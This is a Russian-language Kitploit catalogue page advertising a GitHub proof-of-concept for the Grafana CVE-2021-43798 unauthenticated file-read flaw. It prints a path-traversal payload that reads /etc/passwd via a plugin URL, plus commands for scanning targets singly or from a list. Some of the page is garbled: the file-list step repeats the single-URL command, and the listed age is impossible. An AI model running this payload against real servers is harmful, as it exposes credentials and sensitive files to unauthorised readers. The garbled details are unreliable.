Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-43798-grafana_fileread — POC для уязвимости произвольного чтения файлов Grafana CVE-2021-43798, использующий метод обнаружения с перебором нескольких плагинов; поддерживает указание одного URL-адреса и чтение URL-адресов из файла. | Kitploit
Инструменты/GitHubGitHub/moch3n/cve-2021-43798-grafana_fileread
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmoch3n/cve-2021-43798-grafana_fileread

CVE-2021-43798-grafana_fileread

POC для уязвимости произвольного чтения файлов Grafana CVE-2021-43798, использующий метод обнаружения с перебором нескольких плагинов; поддерживает указание одного URL-адреса и чтение URL-адресов из файла.

Репозиторий
1714 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-43798-grafana_fileread

Если объект обработан через обратный прокси, можно заменить payload на этот

root@kitploit:~
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"

Grafana — это кроссплатформенная веб-платформа с открытым исходным кодом для визуализации данных. После того как пользователь подключает источник данных, Grafana может отображать графики данных и предупреждения в веб-браузере.
В Grafana существует уязвимость неавторизованного чтения произвольных файлов: не прошедший аутентификацию злоумышленник может использовать её для чтения произвольных файлов на хосте.

CVE: CVE-2021-43798
Компонент: Grafana Тип уязвимости: чтение файлов
Воздействие: получение конфиденциальной информации
Краткое описание: неавторизованный злоумышленник может использовать эту уязвимость для получения конфиденциальных файлов с сервера

Инструкция по использованию

  1. Проверка одного URL-адреса
root@kitploit:~
python3 grafana_fileread.py -u http://localhost:3000

image Полученные данные можно просмотреть в файле grafana 8.x_fileread_vuln.txt image 2. Проверка IP-адресов из файла

root@kitploit:~
python3 grafana_fileread.py -u http://localhost:3000

image

  1. -h — просмотр справки image
Скачать инструмент